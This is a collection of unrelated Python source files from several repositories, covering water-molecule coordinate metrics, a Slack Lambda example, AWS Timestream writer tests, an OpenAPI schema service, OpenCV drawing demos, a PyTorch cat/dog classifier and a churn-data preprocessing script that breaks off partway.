dofVec[0] = np.linalg.norm(rO1O3)
rO1O3 /= dofVec[0]
rO3O1 = -rO1O3
rO1D1 = 0.5*(coordH11 + coordH12) - coordO1
rO1D1 /= np.linalg.norm(rO1D1)
rO3D3 = 0.5*(coordH31 + coordH32) - coordO3
rO3D3 /= np.linalg.norm(rO3D3)
if np.linalg.norm(coordH31 - coordO1) <= np.linalg.norm(coordH32 - coordO1):
rH31H32 = coordH32 - coordH31
else:
rH31H32 = coordH31 - coordH32
rH31H32 /= np.linalg.norm(rH31H32)
cross12 = np.cross(rO1O2, rO1D1)
cross12 /= np.linalg.norm(cross12)
cross13 = np.cross(rO1O3, rO1D1)
cross13 /= np.linalg.norm(cross13)
cross31 = np.cross(rO3D3, rO3O1)
cross31 /= np.linalg.norm(cross31)
rperp = rO1O3 - np.dot(rO1O2, rO1O3)*rO1O2
rperp /= np.linalg.norm(rperp)
dofVec[1] = np.arccos(np.dot(rO1O2, rO1O3))
dofVec[2] = np.arccos(np.dot(rperp, cross12))
dofVec[3] = np.arccos(np.dot(rO3D3, rO3O1))
dofVec[4] = np.arccos(np.dot(cross13, cross31))
dofVec[5] = np.arccos(np.dot(rH31H32, cross31))
return dofVec
def distanceMetric1B(vec1, vec2, Rsq=(0.09572**2), sintw=(np.sin(104.52*np.pi/180.0)**2)):
"""Computes distance metric appropriate to 1-body DOFs.
A direct Euclidean distance is not appropriate since using curvilinear coordinates,
so this defines a distance utilizing local curvature that is exact for very small
differences. It comes from Taylor-expanding the formula for Euclidean distance in
spherical coordinates with respect to both angles to second order.
"""
diffs = (vec2 - vec1)**2
dist = np.sqrt(diffs[0] + diffs[1] + diffs[2] + Rsq*diffs[3]
+ Rsq*np.sin(vec2[3])*np.sin(vec1[3])*diffs[4]
+ Rsq*sintw*diffs[5])
return dist
def distanceMetric2B(vec1, vec2, Rsq=(0.09572**2), sintw=(np.sin(104.52*np.pi/180.0)**2)):
"""Computes distance metric appropriate to 2-body DOFs.
A direct Euclidean distance is not appropriate since using curvilinear coordinates,
so this defines a distance utilizing local curvature that is exact for very small
differences. It comes from Taylor-expanding the formula for Euclidean distance in
spherical coordinates with respect to both angles to second order.
Note that this includes 1-body degrees of freedom, so expects 12-dimensional vectors.
"""
diffs = (vec2 - vec1)**2
dist = np.sqrt(diffs[0] + diffs[1] + diffs[2] + Rsq*diffs[3]
+ Rsq*np.sin(vec2[3])*np.sin(vec1[3])*diffs[4]
+ Rsq*sintw*diffs[5]
+ diffs[6] + Rsq*diffs[7] + Rsq*diffs[8]
+ Rsq*np.sin(vec2[8])*np.sin(vec1[8])*diffs[9]
+ Rsq*sintw*diffs[10] + Rsq*sintw*diffs[11])
return dist
def distanceMetric3B(vec1, vec2, Rsq=(0.09572**2), sintw=(np.sin(104.52*np.pi/180.0)**2)):
"""Computes distance metric appropriate to 3-body DOFs.
A direct Euclidean distance is not appropriate since using curvilinear coordinates,
so this defines a distance utilizing local curvature that is exact for very small
differences. It comes from Taylor-expanding the formula for Euclidean distance in
spherical coordinates with respect to both angles to second order.
Note that this includes 1- and 2-body degrees of freedom, so expects 18-dimensional vectors.
"""
diffs = (vec2 - vec1)**2
dist = np.sqrt(diffs[0] + diffs[1] + diffs[2] + Rsq*diffs[3]
+ Rsq*np.sin(vec2[3])*np.sin(vec1[3])*diffs[4]
+ Rsq*sintw*diffs[5]
+ diffs[6] + Rsq*diffs[7] + Rsq*diffs[8]
+ Rsq*np.sin(vec2[8])*np.sin(vec1[8])*diffs[9]
+ Rsq*sintw*diffs[10] + Rsq*sintw*diffs[11]
+ diffs[12] + vec2[12]*vec1[12]*diffs[13]
+ vec2[12]*vec1[12]*np.sin(vec2[13])*np.sin(vec1[13])*diffs[14]
+ Rsq*diffs[15]
+ Rsq*np.sin(vec2[15])*np.sin(vec1[15])*diffs[16]
+ Rsq*sintw*diffs[17])
return dist
``` |
{
"source": "Jimon-s/slackhub",
"score": 3
} |
#### File: slackhub/examples/lambda_function.py
```python
import logging
import urllib.request
import json
logger = logging.getLogger(__name__)
def lambda_handler(event, context):
# Get user input values.
lunch_input = event["view"]["state"]["values"]["lunch_block"]["lunch_action"]["value"]
detail_input = event["view"]["state"]["values"]["detail_block"]["detail_action"]["value"]
# Get private_metadata fields value.
# NOTE: private_metadata field's type is simply "String". SlackHub stores some convenient values in the form of JSON.
# In order to use them easily, you should convert private_metadata field value to JSON.
private_metadata_str = event["view"]["private_metadata"]
private_metadata = json.loads(private_metadata_str)
response_url = private_metadata["response_url"]
# Send a message to Slack.
msg = ("What is your favorite lunch?\n - {}"
"\nTell us more!\n - {}").format(lunch_input, detail_input)
params = {
"text": msg
}
headers = {
"Content-Type": "application/json"
}
req = urllib.request.Request(
response_url, json.dumps(params).encode(), headers)
try:
urllib.request.urlopen(req)
except urllib.error.HTTPError as err:
# If status code is 4XX or 5XX
logger.error(err.code)
except urllib.error.URLError as err:
# If HTTP communication somehow failed
logger.error(err.reason)
return
``` |
{
"source": "Jimon-s/terraform-example-timestream",
"score": 2
} |
#### File: lambda/src/test_timestream_data_writer.py
```python
import pytest
import boto3
from botocore.stub import Stubber
from timestream_data_writer import TimeStreamDataWriter
import os
os.environ['AWS_ACCESS_KEY_ID'] = 'DUMMY_VALUE'
os.environ['AWS_SECRET_ACCESS_KEY'] = 'DUMMY_VALUE'
os.environ['AWS_DEFAULT_REGION'] = 'ap-northeast-1'
os.environ['AWS_DEFAULT_REGION'] = 'ap-northeast-1'
def test_write_records_success():
client = boto3.client('timestream-write')
stubber = Stubber(client)
stubber.add_response('write_records', {'ResponseMetadata':
{
'HTTPStatusCode': 200
}
})
stubber.activate()
# Given
database_name = 'test_database'
table_name = 'test_table'
records = [
{
'Dimensions': [
{
'Name': 'hoge',
'Value': 'fuga',
'DimensionValueType': 'VARCHAR'
},
],
'MeasureName': 'status',
'MeasureValue': 'ok',
'MeasureValueType': 'VARCHAR',
'Time': '1234',
'TimeUnit': 'MILLISECONDS',
'Version': 1234
},
]
# When
timestream_writer = TimeStreamDataWriter(client)
got = timestream_writer.write_records(
database_name=database_name, table_name=table_name, records=records)
# Then
assert got['ResponseMetadata']['HTTPStatusCode'] == 200
def test_write_records_failure():
client = boto3.client('timestream-write')
stubber = Stubber(client)
stubber.add_client_error('write_records', 'want error')
stubber.activate
# Given
database_name = 'test_database'
table_name = 'test_table'
records = [
{
'Dimensions': [
{
'Name': 'hoge',
'Value': 'fuga',
'DimensionValueType': 'VARCHAR'
},
],
'MeasureName': 'status',
'MeasureValue': 'ok',
'MeasureValueType': 'VARCHAR',
'Time': '1234',
'TimeUnit': 'MILLISECONDS',
'Version': 1234
},
]
timestream_writer = TimeStreamDataWriter(client)
with pytest.raises(Exception) as e:
# When
timestream_writer.write_records(
database_name=database_name, table_name=table_name, records=records)
# Then
assert str(e.value) == 'want error'
```
#### File: lambda/src/timestream_data_writer.py
```python
from typing import List
class TimeStreamDataWriter:
def __init__(self, client) -> None:
self.client = client
def write_records(self, database_name: str, table_name: str, records: List[dict], common_attributes: List[dict] = None,):
if self.client is None:
raise Exception('client is not set')
if common_attributes is None:
response = self.client.write_records(
DatabaseName=database_name,
TableName=table_name,
Records=records
)
return response
else:
response = self.client.write_records(
DatabaseName=database_name,
TableName=table_name,
CommonAttributes=common_attributes,
Records=records
)
return response
``` |
{
"source": "jimorie/aioli-openapi",
"score": 2
} |
#### File: aioli-openapi/aioli_openapi/service.py
```python
import warnings
from apispec import APISpec
from apispec.ext.marshmallow import MarshmallowPlugin
from aioli.service import BaseService
from aioli.controller import BaseHttpController
from aioli.exceptions import NoMatchFound
class OpenApiService(BaseService):
_specs = {}
def oas_schema(self, pkg):
spec = APISpec(
title=pkg.meta["name"].capitalize(),
version=pkg.meta["version"],
openapi_version=self.config["oas_version"],
plugins=[MarshmallowPlugin()],
)
for ctrl in pkg.controllers:
if not isinstance(ctrl, BaseHttpController):
continue
routes = {}
for func, handler in ctrl.handlers:
if not handler.status:
warnings.warn(f"No @returns for {func}, cannot generate OAS3 schema for this handler")
break
abspath = handler.path_full
method = handler.method.lower()
if abspath not in routes:
routes[abspath] = {}
if method not in routes[abspath]:
routes[abspath][method] = dict(
responses={},
parameters=[]
)
route = routes[abspath][method]
responses = route["responses"]
parameters = route["parameters"]
for location, schema_cls in handler.schemas:
if location == "response":
if not schema_cls:
content = {}
else:
content = {"application/json": {"schema": schema_cls}}
responses[handler.status] = dict(
description=None,
content=content
)
elif location in ["path", "query", "header"]:
if not schema_cls:
continue
parameters.append({
"in": location,
"schema": schema_cls
})
spec.path(handler.path_full, operations=routes[abspath])
return spec.to_dict()
async def on_startup(self):
for pkg in self.app.registry.imported:
if not pkg.config["path"]:
continue
self._specs[pkg.meta["name"]] = self.oas_schema(pkg)
async def get_schemas(self, **query):
return self._specs
async def get_schema(self, name):
if name not in self._specs:
raise NoMatchFound
return self._specs[name]
``` |
{
"source": "jimorie/nacl",
"score": 3
} |
#### File: nacl/nacl/filters.py
```python
import typing as t
import click
from nacl.expression import Expression
from nacl.errors import errorhandler
class FilterType(click.ParamType):
"""
A `click.ParamType` that converts the parameter input to an `Expression`
object instance. If `register_filter` is `True` all `Expression`
instances created by this `FilterType` instance are also collected in the
class variable `FilterType.registered_filters`.
"""
registered_filters: t.List[Expression] = []
name = "FILTER"
def __init__(self, filter_cls: Expression = None, register_filter=True):
super().__init__()
self.filter_cls = filter_cls or Expression
self.register_filter = register_filter
@errorhandler
def convert(self, value: t.Any, *_) -> Expression:
if isinstance(value, self.filter_cls):
return value
expr = self.parse_filter(value)
if self.register_filter:
self.registered_filters.append(expr)
return expr
def parse_filter(self, expr: str) -> Expression:
return self.filter_cls(expr)
@staticmethod
def escape(value: str) -> str:
return (
value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"').strip()
)
class MacroFilterType(FilterType):
"""
A `FilterType` that expands the parameter input by putting it into a
format defined by the class variable `macro`.
"""
macro = "{}"
def parse_filter(self, expr: str) -> Expression:
return super().parse_filter(self.macro.format(expr))
class CommandType(MacroFilterType):
"""
Filter commands on their command_name.
"""
name = "COMMAND_NAME"
macro = "type == 'command' and command_name == '{}'"
class ContactType(MacroFilterType):
"""
Filter contacts on their contact_name.
"""
name = "CONTACT_NAME"
macro = "type == 'contact' and contact_name == '{}'"
class HostType(MacroFilterType):
"""
Filter hosts on their host_name.
"""
name = "HOST_NAME"
macro = "type == 'host' and host_name == '{}'"
class HostgroupType(MacroFilterType):
"""
Filter hostgroups on their hostgroup_name.
"""
name = "HOSTGROUP_NAME"
macro = "type == 'hostgroup' and hostgroup_name == '{}'"
class ServiceType(FilterType):
"""
Filter services on their host_name and service_description, separated by
semicolon.
"""
name = "HOST_NAME;SERVICE_DESCRIPTION"
def parse_filter(self, expr: str) -> Expression:
if ";" in expr:
host_name, service_description = expr.split(";", 1)
expr = (
"type == 'service' and host_name == '{}' "
"and service_description == '{}'"
).format(
self.escape(host_name),
self.escape(service_description),
)
else:
expr = "type == 'service' and service_description == '{}'".format(
self.escape(expr),
)
return super().parse_filter(expr)
class ServicegroupType(MacroFilterType):
"""
Filter servicegroups on their servicegroup_name.
"""
name = "SERVICEGROUP_NAME"
macro = "type == 'servicegroup' and servicegroup_name == '{}'"
class FilterFile(FilterType, click.Path):
"""
A `FilterType` that reads filters from file.
"""
name = "FILTER_FILE"
def __init__(self, filter_cls: Expression, *args, **kwargs):
FilterType.__init__(self, filter_cls)
click.Path.__init__(self, *args, **kwargs)
def convert(self, value: t.Any, *args) -> t.List[Expression]:
if isinstance(value, list):
return value
filepath = click.Path.convert(self, value, *args)
values = []
with open(filepath, "r") as fh:
for line in fh:
line = line.strip()
if line:
values.append(FilterType.convert(self, line, *args))
return values
``` |
{
"source": "jimorie/scorebored",
"score": 2
} |
#### File: components/game/service.py
```python
from scorebored.overrides.aioli_rdbms.service import NamedDatabaseModelService
from .database import GameModel
class GameService(NamedDatabaseModelService):
async def on_startup(self):
"""
Register database model.
"""
await self.set_db_model(GameModel)
await self.set_db_name_field("name")
``` |
{
"source": "jimorsm/vue-element-admin-fastapi",
"score": 2
} |
#### File: api_v1/report/gen_report.py
```python
import importlib
from app.api.api_v1.report.gen_excel import gen_template
class Report():
def __init__(self, code, query_params):
self.code = code
self.module_url = "app.api.api_v1.report.report." + code
self.module = self.import_module(self.module_url).Query(query_params=query_params)
def import_module(self, module_url):
return importlib.import_module(module_url)
class BaseQuery():
def __init__(self, query_params):
self.query_params = query_params
self.header = []
self.file_name = ""
self.report_config()
def report_config(self):
pass
def get_template(self):
return gen_template(self.header, self.file_name)
def instance_data(self):
return []
def get_instance(self, db):
self.db = db
data = self.instance_data()
return gen_template(self.header, self.file_name, data)
```
#### File: app/crud/crud_menu.py
```python
from typing import Any, Dict, Optional, Union
from sqlalchemy.orm import Session
from app.core.security import get_password_hash, verify_password
from app.crud.base import CRUDBase
from app.models.role import Menu
from app.schemas.system.menu import MenuCreate, MenuUpdate
class CRUDMenu(CRUDBase[Menu, MenuCreate, MenuUpdate]):
def get_by_username(self, db: Session, *, username: str) -> Optional[Menu]:
return db.query(Menu).filter(Menu.username == username).first()
def create(self, db: Session, *, obj_in: MenuCreate) -> Menu:
db_obj = Menu(
username=obj_in.username,
hashed_password=get_password_hash(obj_in.password),
full_name=obj_in.full_name,
is_superuser=obj_in.is_superuser,
)
db.add(db_obj)
db.commit()
db.refresh(db_obj)
return db_obj
def update(
self, db: Session, *, db_obj: Menu, obj_in: Union[MenuUpdate, Dict[str, Any]]
) -> Menu:
if isinstance(obj_in, dict):
update_data = obj_in
else:
update_data = obj_in.dict(exclude_unset=True)
if update_data["password"]:
hashed_password = get_password_hash(update_data["password"])
del update_data["password"]
update_data["hashed_password"] = hashed_password
return super().update(db, db_obj=db_obj, obj_in=update_data)
user = CRUDMenu(Menu)
```
#### File: app/db/init_db.py
```python
import os, logging
import pandas as pd
import numpy as np
from app.db.session import engine
logger = logging.getLogger(__name__)
def init_db() -> None:
# Tables should be created with Alembic migrations
init_data_path = os.path.join(os.path.dirname(__file__), "init_data")
files = ['department.csv', 'menu.csv', 'role.csv', 'user.csv', 'dict_type.csv', 'dict_data.csv',
'role_menu.csv', 'user_department.csv', 'user_dict.csv', 'user_role.csv', ]
for file in files:
file_path = os.path.join(init_data_path, file)
df = pd.read_csv(file_path, sep=",")
if file == "menu.csv":
df['component'] = df['component'].apply(lambda x: '' if np.isnan(x) else x)
df['name'] = df['name'].apply(lambda x: '' if np.isnan(x) else x)
logger.info(f"{file} load successed")
df.to_sql(file.replace(".csv", ""), engine, if_exists="append", index=False)
``` |
{
"source": "jimothyGator/django-currentuser",
"score": 2
} |
#### File: db/models/fields.py
```python
import warnings
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django_currentuser.middleware import get_current_authenticated_user
class CurrentUserField(models.ForeignKey):
warning = ("You passed an argument to CurrentUserField that will be "
"ignored. Avoid args and following kwargs: default, null, to.")
description = _(
'as default value sets the current logged in user if available')
defaults = dict(null=True, default=get_current_authenticated_user,
to=settings.AUTH_USER_MODEL)
def __init__(self, *args, **kwargs):
self._warn_for_shadowing_args(*args, **kwargs)
if "on_delete" not in kwargs:
kwargs["on_delete"] = models.CASCADE
kwargs.update(self.defaults)
super(CurrentUserField, self).__init__(**kwargs)
def _warn_for_shadowing_args(self, *args, **kwargs):
if args:
warnings.warn(self.warning)
else:
for key in set(kwargs).intersection(set(self.defaults.keys())):
if not kwargs[key] == self.defaults[key]:
warnings.warn(self.warning)
break
``` |
{
"source": "JimothyJohn/PerceiverToolkit",
"score": 3
} |
#### File: JimothyJohn/PerceiverToolkit/app.py
```python
import streamlit as st
import numpy as np
import cv2
import imageio
from perceiver import perceiver, io_processors
import OpticalFlow
import Classification
# Extract flows from imageio reader
def GetFlows(reader, sampleRate=5, start=0, length=1):
# Get first frame from reader
firstFrame = reader.get_data(start)
# Get original dimensions for output
width, height = reader.get_meta_data()["source_size"]
# Create feedback for process
my_bar = st.progress(0)
# Create writer for video file
w = imageio.get_writer('outputs/flowing.mp4',
format='FFMPEG', mode='I', fps=int(FPS/sampleRate))
# Loop through input video
for idx in range(length):
# Grab next frame
secondFrame = reader.get_data((idx+start+1)*sampleRate)
# Extract flow using notebook example
flow = OpticalFlow.ExtractFlow(firstFrame, secondFrame)[0]
# Move to next frame
firstFrame = secondFrame
# Convert flow to BGR image
flowImage = OpticalFlow.visualize_flow(flow)
# Write resized flow output to video file
w.append_data(cv2.resize(flowImage, (width, height)))
# Increment progress bar
my_bar.progress(idx/(length-1))
w.close()
return
st.set_page_config(page_title='Perceiver IO', page_icon='docs/deepmind-logo.png',
layout="wide", initial_sidebar_state="auto", menu_items=None)
st.sidebar.header('Perceiver IO')
program = st.sidebar.selectbox('Choose a function', [
'Optical Flow',
'Image Classification',
'Language Modeling',
'Video Autoencoding'], 0)
st.header(program)
left, right = st.columns(2)
if program == 'Optical Flow':
inputFile = st.file_uploader("Upload a video")
if inputFile is not None:
inputVideo = inputFile.getvalue()
reader = imageio.get_reader(inputVideo, '.mp4')
FPS = reader.get_meta_data()["fps"]
vidLength = reader.get_meta_data()["duration"]
sampleRate = st.slider('Sample rate (frames)', 1, 10, 3, 1)
startTime = int(st.slider('Start time (s)', 0.,
vidLength, 0., 0.1)*FPS/sampleRate)
length = int(st.slider('Length (s)', 0.1, vidLength -
startTime, 1., 0.1)*FPS/sampleRate)
left.video(inputVideo)
flows = GetFlows(reader, sampleRate, startTime, length)
right.video('outputs/flowing.mp4')
elif program == 'Image Classification':
inputFile = st.file_uploader("Upload an image to classify")
if inputFile is not None:
inputImage = inputFile.getvalue()
inputArray = imageio.imread(inputImage)
left.image(inputImage)
results = Classification.ClassifyImage(inputArray)
right.write(results)
elif program == 'Language Modeling':
st.header('In progress...')
elif program == 'Video Autoencoding':
st.header('In progress...')
```
#### File: JimothyJohn/PerceiverToolkit/Language.py
```python
from typing import Union
import haiku as hk
import jax
import jax.numpy as jnp
import numpy as np
import pickle
from perceiver import perceiver, position_encoding, io_processors, bytes_tokenizer
# One of learned_position_encoding, fourier_position_encoding, or conv_preprocessing'
# learned_position_encoding: Uses a learned position encoding over the image
# and 1x1 convolution over the pixels
# fourier_position_encoding: Uses a 2D fourier position encoding
# and the raw pixels
# conv_preprocessing: Uses a 2D fourier position encoding
# and a 2D conv-net as preprocessing
# @param ['learned_position_encoding', 'fourier_position_encoding', 'conv_preprocessing']
with open("models/language_perceiver_io_bytes.pickle", "rb") as f:
params = pickle.loads(f.read())
D_MODEL = 768
D_LATENTS = 1280
MAX_SEQ_LEN = 2048
encoder_config = dict(
num_self_attends_per_block=26,
num_blocks=1,
z_index_dim=256,
num_z_channels=D_LATENTS,
num_self_attend_heads=8,
num_cross_attend_heads=8,
qk_channels=8 * 32,
v_channels=D_LATENTS,
use_query_residual=True,
cross_attend_widening_factor=1,
self_attend_widening_factor=1)
decoder_config = dict(
output_num_channels=D_LATENTS,
position_encoding_type='trainable',
output_index_dims=MAX_SEQ_LEN,
num_z_channels=D_LATENTS,
qk_channels=8 * 32,
v_channels=D_MODEL,
num_heads=8,
final_project=False,
use_query_residual=False,
trainable_position_encoding_kwargs=dict(num_channels=D_MODEL))
# The tokenizer is just UTF-8 encoding (with an offset)
tokenizer = bytes_tokenizer.BytesTokenizer()
def apply_perceiver(
inputs: jnp.ndarray, input_mask: jnp.ndarray) -> jnp.ndarray:
"""Runs a forward pass on the Perceiver.
Args:
inputs: input bytes, an int array of shape [B, T]
input_mask: Array of shape indicating which entries are valid and which are
masked. A truthy value indicates that the entry is valid.
Returns:
The output logits, an array of shape [B, T, vocab_size].
"""
assert inputs.shape[1] == MAX_SEQ_LEN
embedding_layer = hk.Embed(
vocab_size=tokenizer.vocab_size,
embed_dim=D_MODEL)
embedded_inputs = embedding_layer(inputs)
batch_size = embedded_inputs.shape[0]
input_pos_encoding = perceiver.position_encoding.TrainablePositionEncoding(
index_dim=MAX_SEQ_LEN, num_channels=D_MODEL)
embedded_inputs = embedded_inputs + input_pos_encoding(batch_size)
perceiver_mod = perceiver.Perceiver(
encoder=perceiver.PerceiverEncoder(**encoder_config),
decoder=perceiver.BasicDecoder(**decoder_config))
output_embeddings = perceiver_mod(
embedded_inputs, is_training=False, input_mask=input_mask, query_mask=input_mask)
logits = io_processors.EmbeddingDecoder(
embedding_matrix=embedding_layer.embeddings)(output_embeddings)
return logits
apply_perceiver = hk.transform(apply_perceiver).apply
input_str = "This is an incomplete sentence where some words are missing."
input_tokens = tokenizer.to_int(input_str)
# Mask " missing.". Note that the model performs much better if the masked chunk
# starts with a space.
input_tokens[51:60] = tokenizer.mask_token
print("Tokenized string without masked bytes:")
print(tokenizer.to_string(input_tokens))
inputs = input_tokens[None]
input_mask = np.ones_like(inputs)
def pad(max_sequence_length: int, inputs, input_mask):
input_len = inputs.shape[1]
assert input_len <= max_sequence_length
pad_len = max_sequence_length - input_len
padded_inputs = np.pad(
inputs,
pad_width=((0, 0), (0, pad_len)),
constant_values=tokenizer.pad_token)
padded_mask = np.pad(
input_mask,
pad_width=((0, 0), (0, pad_len)),
constant_values=0)
return padded_inputs, padded_mask
inputs, input_mask = pad(MAX_SEQ_LEN, inputs, input_mask)
rng = jax.random.PRNGKey(1) # Unused
out = apply_perceiver(params, rng=rng, inputs=inputs, input_mask=input_mask)
masked_tokens_predictions = out[0, 51:60].argmax(axis=-1)
print("Greedy predictions:")
print(masked_tokens_predictions)
print()
print("Predicted string:")
print(tokenizer.to_string(masked_tokens_predictions))
``` |
{
"source": "JimothyJohn/YTStyleTransfer",
"score": 2
} |
#### File: YTStyleTransfer/Python/addstyle.py
```python
import os, shutil, functools, argparse
from matplotlib import gridspec
import matplotlib.pylab as plt
import numpy as np
import tensorflow as tf
tf.compat.v1.enable_eager_execution()
import tensorflow_hub as hub
## Imaging tools
import PIL
from PIL import Image
from PIL import ImageFilter
from PIL import ImageDraw
from PIL import ImageFont
# Load image path as tf tensor ADJUST MAX DIMS
def load_img(path_to_img):
max_dim = 1024 # maximum size that is compatible with model
img = tf.io.read_file(path_to_img) # read file and return a tensor type of string
img = tf.image.decode_image(img, channels=3) # convert bytes-type string above into Tensor of dtype
img = tf.image.convert_image_dtype(img, tf.float32) # convert to float32 dtype
shape = tf.cast(tf.shape(img)[:-1], tf.float32) # get LAST two axes as resolution / dimensions in float values
long_dim = max(shape) # find longest side
scale = max_dim / long_dim # find scaling factor based on largest side
new_shape = tf.cast(shape * scale, tf.int32) # create new shape based on scale
img = tf.image.resize(img, new_shape) # resize to new shape
img = img[tf.newaxis, :] # adds another axis aka brackets on the outside
return img # return image
# Converts tensor to PIL.Image
def tensor_to_image(tensor):
tensor = tensor*255 # convert tensor from 0-1 to 0-255
tensor = np.array(tensor, dtype=np.uint8) # convert tensor type to integer for RGB indexing
if np.ndim(tensor)>3: # if tensor is more than W xH x channel
assert tensor.shape[0] == 1 # flatten?
tensor = tensor[0] # grab initial index
return PIL.Image.fromarray(tensor) # convert np to PIL image
# Apply style to content with optional mask
def style_image(contentPath, styleTensor):
contentTensor = load_img(contentPath)
stylizedTensor = hub_module(tf.constant(contentTensor), tf.constant(styleTensor))[0]
outputTensor = tf.squeeze(stylizedTensor, axis=0) # get rid of batch dimension
return tensor_to_image(outputTensor) # convert tensor back to image
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--style', help='input file')
args = parser.parse_args()
# Directories
CONTENT_PATH = '/input/frames/'
MASK_PATH = '/input/motion/'
STYLIZED_PATH = '/input/stylized/'
# Flags
MASKING = False
styleTensor = load_img('/input/SampleImages/'+args.style+'.jpg')
contentTensor = load_img(CONTENT_PATH+'clip.0001.png')
_, height, width, _ = contentTensor.shape
# Load TF-Hub module.
hub_handle = 'https://tfhub.dev/google/magenta/arbitrary-image-stylization-v1-256/2'
hub_module = hub.load(hub_handle)
lastImage = style_image(CONTENT_PATH+'clip.0001.png', styleTensor)
lastImage.save('/input/stylized/stylized.0001.png')
for idx, framePath in enumerate(sorted(os.listdir(CONTENT_PATH))):
if idx==0: continue # skip first frame
styleImage = style_image(CONTENT_PATH+framePath, styleTensor).resize((width, height), Image.ANTIALIAS)
try:
flowMask = Image.open(MASK_PATH+'motion.{:04d}.png'.format(idx-1)).resize((width, height), Image.ANTIALIAS) # change to idx+1
except:
break
if MASKING:
segMask = Image.open('/input/segments/segment.{:04d}.png'.format(idx))
outputMask = flowMask & segMask # merge style and flow images
else:
outputMask = flowMask
lastImage = Image.composite(styleImage, lastImage, flowMask)
lastImage.save('/input/stylized/stylized.{:04d}.png'.format(idx+1))
``` |
{
"source": "jimothyr/pcduino-photobooth",
"score": 3
} |
#### File: pcduino-photobooth/main/online.py
```python
import urllib2
def internet_on():
try:
response=urllib2.urlopen('http://192.168.127.12',timeout=1)
return True
except urllib2.URLError as err: pass
return False
def phone_home():
if internet_on():
print 'secret key'
print 'send stats'
print 'start syncing files!!'
def write_out_data(data):
f=file
file = open("data.file.txt",'+a')
file.write(data)
file.close()
#write outs file list in form to be sucked in by javascript on webserver
``` |
{
"source": "JimouChen/computer-vision",
"score": 3
} |
#### File: computer-vision/Basic/draw_pic.py
```python
import numpy as np
import cv2
import matplotlib.pyplot as plt
def draw_img(image):
plt.imshow(image)
plt.axis('off')
plt.show()
# 创造一张黑底图片,长宽为300的3通道图片
black_img = np.zeros((300, 300, 3), dtype='uint8')
draw_img(black_img)
# 画直线
green = (0, 255, 0)
cv2.line(black_img, (0, 0), (300, 300), green, thickness=5) # 里面是起点到终点
draw_img(black_img)
blue = (0, 0, 225)
cv2.line(black_img, (300, 0), (150, 150), blue, 8)
draw_img(black_img)
# 画矩形
red = (255, 0, 0)
cv2.rectangle(black_img, (20, 20), (60, 60), red, 2)
draw_img(black_img)
# -1是填充
cv2.rectangle(black_img, (50, 50), (100, 250), green, -1)
draw_img(black_img)
# 画圆
white = (255, 255, 255)
# 圆心位置
(rx, ry) = black_img.shape[1] // 2, black_img.shape[0] // 2
# 循环画出不同半径的圆
for r in range(0, 151, 15):
cv2.circle(black_img, (rx, ry), r, white, 2)
draw_img(black_img)
'''随机生成圆'''
# 重新弄个黑底画布
new_img = np.zeros((300, 300, 3), dtype='uint8')
# 画10个圆
for i in range(10):
# 随机取半径
r = np.random.randint(5, 200)
# 随机取颜色
color = np.random.randint(0, 255, size=(3,)).tolist()
# 圆心
point = np.random.randint(0, 300, size=(2,))
# 画有填充的
cv2.circle(new_img, tuple(point), r, color, -1)
draw_img(new_img)
```
#### File: PytorchLearning/project/cat_dog_classify.py
```python
import torch
from torch import nn, optim
from torchvision import datasets, transforms, models
from torch.utils.data import DataLoader
import sys
if __name__ == '__main__':
# 数据预处理,transforms用来处理数据,用来数据增强
transform = transforms.Compose([
transforms.RandomResizedCrop(224), # 对图像进行随机裁剪,然后重新调整大小为224*224
transforms.RandomRotation(20), # 随机选择角度,顺或者逆时针20读
transforms.RandomHorizontalFlip(p=0.5), # 50%的概率进行随机水平翻转
transforms.ToTensor()
])
# 读取数据
train_dataset = datasets.ImageFolder('image/train', transform)
test_dataset = datasets.ImageFolder('image/test', transform)
# 导入数据,设置批次和打乱
train_loader = DataLoader(train_dataset, batch_size=8, shuffle=True)
test_loader = DataLoader(test_dataset, batch_size=8, shuffle=True)
# print(train_dataset.classes)
model = models.vgg16(pretrained=False)
print(model)
# 加这句话,不训练卷积层,只训练模型的全连接层,不更新权值
# 因为他已经把卷积层训练得非常好了,我们可以不用去训练它
# 如果没加这句话,那准确率会更高,但是训练时间更长
for p in model.parameters():
p.requires_grad = False
# 构建新的全连接层,25088和上面model的输入一致,输出是自定义的2个类
model.classifier = nn.Sequential(
nn.Linear(25088, 100),
nn.ReLU(),
nn.Dropout(p=0.5),
nn.Linear(100, 2)
)
# 定义代价函数
entropy_loss = nn.CrossEntropyLoss()
# 定义优化器
opt = optim.Adam(model.parameters(), lr=0.0003)
def train():
model.train()
for i, data in enumerate(train_loader):
# 获取数据和对应标签
inputs, labels = data
# 获得预测结果
out = model(inputs)
# 代价函数
loss = entropy_loss(out, labels)
# 梯度清零
loss.backward()
# 修改权值
opt.step()
def test():
model.eval()
correct = 0
for i, data in enumerate(test_loader):
# 获得数据和对应的标签
inputs, labels = data
# 获得模型预测结果
out = model(inputs)
# 获得最大值,以及最大值所在的位置
_, predicted = torch.max(out, 1)
# 预测正确的数量
correct += (predicted == labels).sum()
print("Test acc: {0}".format(correct.item() / len(test_dataset)))
correct = 0
for i, data in enumerate(train_loader):
# 获得数据和对应的标签
inputs, labels = data
# 获得模型预测结果
out = model(inputs)
# 获得最大值,以及最大值所在的位置
_, predicted = torch.max(out, 1)
# 预测正确的数量
correct += (predicted == labels).sum()
print("Train acc: {0}".format(correct.item() / len(train_dataset)))
for epoch in range(10):
print('周期:', epoch)
train()
test()
# 保存该模型
torch.save(model.state_dict(), 'cat_dog.pth')
``` |
{
"source": "JimouChen/kaggle-project",
"score": 3
} |
#### File: kaggle-project/ChurnModelling/churn_predict.py
```python
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import classification_report
def deal_train(path):
train_data = pd.read_csv(path)
# 处理国家转换为数字
train_data.loc[train_data['Geography'] == 'France', 'Geography'] = 1
train_data.loc[train_data['Geography'] == 'Spain', 'Geography'] = 2
train_data.loc[train_data['Geography'] == 'Germany', 'Geography'] = 3
# 处理性别
train_data.loc[train_data['Gender'] == 'Female', 'Gender'] = 0
train_data.loc[train_data['Gender'] == 'Male', 'Gender'] = 1
# 选取有用的特征
feature = ['CreditScore', 'Geography', 'Gender',
'Age', 'Tenure', 'Balance', 'NumOfProducts',
'HasCrCard', 'IsActiveMember', 'EstimatedSalary']
x_data = train_data[feature]
y_data = train_data['Exited']
